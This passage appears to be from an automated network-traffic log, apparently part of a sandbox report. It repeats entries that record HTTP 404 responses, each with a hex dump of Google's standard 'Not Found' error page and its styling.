65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
